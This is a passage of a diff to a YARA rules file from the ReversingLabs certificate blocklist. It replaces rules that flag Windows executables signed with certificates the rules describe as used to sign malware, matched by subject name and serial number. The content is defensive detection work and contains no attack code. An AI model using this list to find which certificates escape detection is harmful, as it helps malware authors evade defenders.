= 75 quality = 90 tags = "INFO, FILE" @@ -17687,22 +37478,22 @@ rule REVERSINGLABS_Cert_Blocklist_Eeefec4308Abe63323600E1608F5E6F2 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "YUPITER-STROI, OOO" and (pe.signatures[i].serial=="00:ee:ef:ec:43:08:ab:e6:33:23:60:0e:16:08:f5:e6:f2" or pe.signatures[i].serial=="ee:ef:ec:43:08:ab:e6:33:23:60:0e:16:08:f5:e6:f2") and 1491177600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Fort LLC" and (pe.signatures[i].serial=="00:ba:d3:5f:d7:00:25:d4:6c:56:b8:9e:32:b1:a3:95:4c" or pe.signatures[i].serial=="ba:d3:5f:d7:00:25:d4:6c:56:b8:9e:32:b1:a3:95:4c") and 1604937337<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0Ecd460Ce14Bd8Ef2926Da2Cd9A44176 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_7B91468122273Aa32B7Cfc80C331Ea13 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "94128695-0206-5c04-b792-34400f8ce890" + id = "2a949015-3b7b-5123-8df1-f2199ef636c9" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12648-L12664" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "58fa244c125415ef7a3cf0feb79add4db7c84f94c23e5d27e840fb17c18d67ef" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6676-L6692" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "49d6fd8b325df4bc688275a09cee35e1040172eb6f3680aa2b6f0f3640c0782e" score = 75 quality = 90 tags = "INFO, FILE" @@ -17712,22 +37503,22 @@ rule REVERSINGLABS_Cert_Blocklist_0Ecd460Ce14Bd8Ef2926Da2Cd9A44176 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Rabah Azrarak" and pe.signatures[i].serial=="0e:cd:46:0c:e1:4b:d8:ef:29:26:da:2c:d9:a4:41:76" and 1463035153<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO KBI" and pe.signatures[i].serial=="7b:91:46:81:22:27:3a:a3:2b:7c:fc:80:c3:31:ea:13" and 1586942863<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_5E75E997F3D70Bb8C182D56B25B7D836 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_3E267B5D14Cdf1F645C1Ec545Cec3Aee : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "3578b97f-1d87-517a-8ea9-17606017e46a" + id = "adff6ae2-076c-5c97-9fea-f95d770a3821" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12666-L12682" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a2c6a57759fb0717951f83a32c00deeae82cad772b6cb7f60fa96232b6b82560" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6694-L6710" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e36ae57d715a71aa7d26dd003d647dfa7ab16d64e5411b6c49831544fc482645" score = 75 quality = 90 tags = "INFO, FILE" @@ -17737,22 +37528,22 @@ rule REVERSINGLABS_Cert_Blocklist_5E75E997F3D70Bb8C182D56B25B7D836 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Primetech Ltd." and pe.signatures[i].serial=="5e:75:e9:97:f3:d7:0b:b8:c1:82:d5:6b:25:b7:d8:36" and 1324252800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO KBI" and pe.signatures[i].serial=="3e:26:7b:5d:14:cd:f1:f6:45:c1:ec:54:5c:ec:3a:ee" and 1579825892<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_D5690D94F15315E143Db10Af35497Dc5 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Ae6D3C0269Ef6497E14379C51A8507Ba : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "324b2e2f-bad7-5ac4-864c-044d99fa01dc" + id = "5b8e7730-cb8b-5c51-9784-d944453bc898" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12684-L12702" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4ac17d0f0e4ef2bb5f6cda8e7cb07a641d49c83465a0a80c46ff6e0e752d1847" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6712-L6730" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "23570962c80bddce28a3dee9d4d864cf3cf64018eec6fbcbdd3ca2658c9f660f" score = 75 quality = 90 tags = "INFO, FILE" @@ -17762,22 +37553,22 @@ rule REVERSINGLABS_Cert_Blocklist_D5690D94F15315E143Db10Af35497Dc5 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PET SERVICES d.o.o." and (pe.signatures[i].serial=="00:d5:69:0d:94:f1:53:15:e1:43:db:10:af:35:49:7d:c5" or pe.signatures[i].serial=="d5:69:0d:94:f1:53:15:e1:43:db:10:af:35:49:7d:c5") and 1576195200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VELES PROPERTIES LIMITED" and (pe.signatures[i].serial=="00:ae:6d:3c:02:69:ef:64:97:e1:43:79:c5:1a:85:07:ba" or pe.signatures[i].serial=="ae:6d:3c:02:69:ef:64:97:e1:43:79:c5:1a:85:07:ba") and 1578566034<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_8223C74185Add0927246F5E33Ebac467 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Fd8C468Cc1B45C9Cfb41Cbd8C835Cc9E : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "dfe87130-7b2f-5f8a-8c2d-8653c2bd0cd3" + id = "f0050a52-65d5-54b2-b06d-08812af98948" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12704-L12722" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f700b4f7cdfda9f678c3a5259d4293640c50567ec277c5b3db69756534e2007f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6732-L6750" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "230d33f0d1d31d4cb76bf3b13f109d3cc9ace846daef145e1dc7666b33c8a42a" score = 75 quality = 90 tags = "INFO, FILE" @@ -17787,22 +37578,22 @@ rule REVERSINGLABS_Cert_Blocklist_8223C74185Add0927246F5E33Ebac467 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TOV Virikton" and (pe.signatures[i].serial=="00:82:23:c7:41:85:ad:d0:92:72:46:f5:e3:3e:ba:c4:67" or pe.signatures[i].serial=="82:23:c7:41:85:ad:d0:92:72:46:f5:e3:3e:ba:c4:67") and 1463616000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Pivo ZLoun s.r.o." and (pe.signatures[i].serial=="00:fd:8c:46:8c:c1:b4:5c:9c:fb:41:cb:d8:c8:35:cc:9e" or pe.signatures[i].serial=="fd:8c:46:8c:c1:b4:5c:9c:fb:41:cb:d8:c8:35:cc:9e") and 1604019600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Dd9E9E1D7C573714E3F567C5380Ae6D0 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_7C061Baa3118327255161F6A7Fa4E21D : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "72745795-0261-5b7b-b25e-8220bced90ec" + id = "f597956a-d11b-54e4-91b6-0572c0b10279" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12724-L12742" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7bbcdb989d53bafbb2bdb694be72d4f7305323c01e8f1eafcb7cd889df165ff6" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6752-L6770" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4193fce69af03b3521a3cc442b762c52f8585b44fa6b0bd78b9ace171b807ed4" score = 75 quality = 90 tags = "INFO, FILE" @@ -17812,22 +37603,22 @@ rule REVERSINGLABS_Cert_Blocklist_Dd9E9E1D7C573714E3F567C5380Ae6D0 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CREA&COM d.o.o." and (pe.signatures[i].serial=="00:dd:9e:9e:1d:7c:57:37:14:e3:f5:67:c5:38:0a:e6:d0" or pe.signatures[i].serial=="dd:9e:9e:1d:7c:57:37:14:e3:f5:67:c5:38:0a:e6:d0") and 1575849600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "YUTAKS, OOO" and (pe.signatures[i].serial=="00:7c:06:1b:aa:31:18:32:72:55:16:1f:6a:7f:a4:e2:1d" or pe.signatures[i].serial=="7c:06:1b:aa:31:18:32:72:55:16:1f:6a:7f:a4:e2:1d") and 1599611338<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_3D5E71 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_04332C16724Ffeda5868D22Af56Aea43 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "7180b20d-f367-5260-88cd-dd2a1269f89b" + id = "1e5a2708-2875-50ab-af6b-3be91f38e13f" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12744-L12760" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "aa73ac6569e4bb0084d7b148b2186ec2737a691a133319b21b666aa16bca9f2d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6772-L6788" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6b62d5c7a3c6e3096797cd2f515d86045fa77682638bda44175d05c5b6c5bbc0" score = 75 quality = 90 tags = "INFO, FILE" @@ -17837,22 +37628,22 @@ rule REVERSINGLABS_Cert_Blocklist_3D5E71 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OF.PL sp. z o.o." and pe.signatures[i].serial=="3d:5e:71" and 1066997730<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Bespoke Software Solutions Limited" and pe.signatures[i].serial=="04:33:2c:16:72:4f:fe:da:58:68:d2:2a:f5:6a:ea:43" and 1597971601<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_C33187Fe848A65E8484Ea492Cb2Cbb18 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_030012F134E64347669F3256C7D050C5 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "fa05113a-a21e-5f21-aae3-b646e5b42dfb" + id = "1e61a781-d5fb-5f05-81c4-3cc697ece13c" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12762-L12780" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b66d67b74d73a143cb5301b232abd5f0f84f058223d4494b924a25dffb49037a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6790-L6806" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1a55856bfa4c632b2b0404686dc7ba5e7238b619dd4d2eb68c3d291bc86e52c4" score = 75 quality = 90 tags = "INFO, FILE" @@ -17862,22 +37653,22 @@ rule REVERSINGLABS_Cert_Blocklist_C33187Fe848A65E8484Ea492Cb2Cbb18 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SELCUK GUNDOGDU" and (pe.signatures[i].serial=="00:c3:31:87:fe:84:8a:65:e8:48:4e:a4:92:cb:2c:bb:18" or pe.signatures[i].serial=="c3:31:87:fe:84:8a:65:e8:48:4e:a4:92:cb:2c:bb:18") and 1426204800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Futumarket LLC" and pe.signatures[i].serial=="03:00:12:f1:34:e6:43:47:66:9f:32:56:c7:d0:50:c5" and 1604036657<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_6Fc143Ba34Cabf1De7A4C7F8F4Cdad6D : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Fa3Dcac19B884B44Ef4F81541184D6B0 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "546692ed-2506-56ad-b678-e74b857380a3" + id = "574ee0d4-ba7c-5c74-b711-222f92196f4a" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12782-L12798" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ffe25e4478a2245d4e5b330bb9300fb6cb48afb0fe3bd72bd62a589eeee3fe89" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6808-L6826" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "324de84cb8c2f5402c9326749e3456e11312828df2523954fd84f7fb3298fdf3" score = 75 quality = 90 tags = "INFO, FILE" @@ -17887,22 +37678,22 @@ rule REVERSINGLABS_Cert_Blocklist_6Fc143Ba34Cabf1De7A4C7F8F4Cdad6D : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "World Telecom International Inc." and pe.signatures[i].serial=="6f:c1:43:ba:34:ca:bf:1d:e7:a4:c7:f8:f4:cd:ad:6d" and 1147046400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Unicom Ltd" and (pe.signatures[i].serial=="00:fa:3d:ca:c1:9b:88:4b:44:ef:4f:81:54:11:84:d6:b0" or pe.signatures[i].serial=="fa:3d:ca:c1:9b:88:4b:44:ef:4f:81:54:11:84:d6:b0") and 1603958571<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_6Ac6268B2E431A2C1369346D175D0E30 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0E6F4Cb8B06E01C3Bd296Ace3A95F814 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "12664460-19e1-5b73-8299-cfe19dffc0b4" + id = "7a829a63-eeb4-50ef-829d-fc13572c1148" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12800-L12816" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "27efaba9bd9cd116f640007c1e951bb77757efbe148b5f953e71d6621d7f16b2" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6828-L6844" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f3184a9d1fe2a1cf2dcc04d26c284aa9a651d2f00aa28642d7f951550a050138" score = 75 quality = 90 tags = "INFO, FILE" @@ -17912,22 +37703,22 @@ rule REVERSINGLABS_Cert_Blocklist_6Ac6268B2E431A2C1369346D175D0E30 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Install Sync" and pe.signatures[i].serial=="6a:c6:26:8b:2e:43:1a:2c:13:69:34:6d:17:5d:0e:30" and 1436140800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "EVATON, s.r.o." and pe.signatures[i].serial=="0e:6f:4c:b8:b0:6e:01:c3:bd:29:6a:ce:3a:95:f8:14" and 1603957781<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0Fc4D9178B8Df2C19E269Ac6F43Dd708 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_085B70224253486624Fc36Fa658A1E32 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "b336ff6c-d94e-5715-bb97-6b60cda90911" + id = "7d27604e-4ecd-559c-9180-4914e7f1f6c9" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12818-L12834" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "41dfe37b464d337268a8bb0e23124df7b50ab966038e8ad33bda81a4d86040ca" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6846-L6862" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "50ff48a421a109f8c6bf92032691d9b673945bc591005004ff17dc18c97d4aea" score = 75 quality = 90 tags = "INFO, FILE" @@ -17937,22 +37728,22 @@ rule REVERSINGLABS_Cert_Blocklist_0Fc4D9178B8Df2C19E269Ac6F43Dd708 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PK Partnership, OOO" and pe.signatures[i].serial=="0f:c4:d9:17:8b:8d:f2:c1:9e:26:9a:c6:f4:3d:d7:08" and 1466553600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Best Fud, OOO" and pe.signatures[i].serial=="08:5b:70:22:42:53:48:66:24:fc:36:fa:65:8a:1e:32" and 1597971601<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_E01407871E2146C9Baab1Ae7Ab8Ab172 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_51Cd5393514F7Ace2B407C3Dbfb09D8D : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "229772ae-68a2-566b-bf61-988cb41d7d8f" + id = "ac86893f-2edd-5f1c-96eb-4cb140e8e001" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12836-L12854" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1801e7f15bd5f916fc08d263a845d296d334ca9de1040008f619719c1b5c0a3b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6864-L6880" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4cd08b9113a7c1f4f2d438ac59ad0be503daded3a08b8c8e8ce3e0dfdddf259e" score = 75 quality = 90 tags = "INFO, FILE" @@ -17962,22 +37753,22 @@ rule REVERSINGLABS_Cert_Blocklist_E01407871E2146C9Baab1Ae7Ab8Ab172 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TOV Intalev Ukraina" and (pe.signatures[i].serial=="00:e0:14:07:87:1e:21:46:c9:ba:ab:1a:e7:ab:8a:b1:72" or pe.signatures[i].serial=="e0:14:07:87:1e:21:46:c9:ba:ab:1a:e7:ab:8a:b1:72") and 1464220800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "APPI CZ a.s" and pe.signatures[i].serial=="51:cd:53:93:51:4f:7a:ce:2b:40:7c:3d:bf:b0:9d:8d" and 1605299467<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Effc6D19D6Fc85872E4E5B3Ccee6D301 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_B72179C027B9037Ee220E81Ab18Fe56D : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "56114e31-2e9b-5d16-8435-708bbb2687cc" + id = "85639e74-80b0-59c6-b31b-5b3d9587b37a" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12856-L12874" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a746c4193f1264cb96eae0ea85c2c76b5caf3b72ca950f76af426b4d68d210b3" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6882-L6900" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1416768011ff824307d112bdeecce1ad50d1f673e92bef8fddbbeb58ff98b1b1" score = 75 quality = 90 tags = "INFO, FILE" @@ -17987,22 +37778,22 @@ rule REVERSINGLABS_Cert_Blocklist_Effc6D19D6Fc85872E4E5B3Ccee6D301 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "C\\xC3\\x93IR IP LIMITED" and (pe.signatures[i].serial=="00:ef:fc:6d:19:d6:fc:85:87:2e:4e:5b:3c:ce:e6:d3:01" or pe.signatures[i].serial=="ef:fc:6d:19:d6:fc:85:87:2e:4e:5b:3c:ce:e6:d3:01") and 1572307200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Planeta, TOV" and (pe.signatures[i].serial=="00:b7:21:79:c0:27:b9:03:7e:e2:20:e8:1a:b1:8f:e5:6d" or pe.signatures[i].serial=="b7:21:79:c0:27:b9:03:7e:e2:20:e8:1a:b1:8f:e5:6d") and 1603381300<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_2F4A25D52B16Eb4C9Dfe71Ebbd8121Bb : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_07B74C70C4Aa092648B7F0D1A8A3A28F : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "1afd5d2b-fd6d-58ca-b966-788d465cd0ed" + id = "f941b7d6-f168-57aa-881a-54679a2b948c" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12876-L12892" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7b237ae0574afeafcc05f71512c09d3170edbee20e512a1b0af5b431923dc25c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6902-L6918" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "97759fa2e519936115f0493e251f9abc0cce3ada437776a5a370388512235491" score = 75 quality = 90 tags = "INFO, FILE" @@ -18012,22 +37803,22 @@ rule REVERSINGLABS_Cert_Blocklist_2F4A25D52B16Eb4C9Dfe71Ebbd8121Bb : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Blist LLC" and pe.signatures[i].serial=="2f:4a:25:d5:2b:16:eb:4c:9d:fe:71:eb:bd:81:21:bb" and 1629763200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Rad-Grad D.O.O." and pe.signatures[i].serial=="07:b7:4c:70:c4:aa:09:26:48:b7:f0:d1:a8:a3:a2:8f" and 1603240965<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_6889Aab6202Bcc5F11Caedf4D04F435B : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_4C8Def294478B7D59Ee95C61Fae3D965 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "d4499a1d-aa8d-5056-ad91-439f27f00c33" + id = "549249df-690c-5b75-ac1a-77b509c9e163" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = 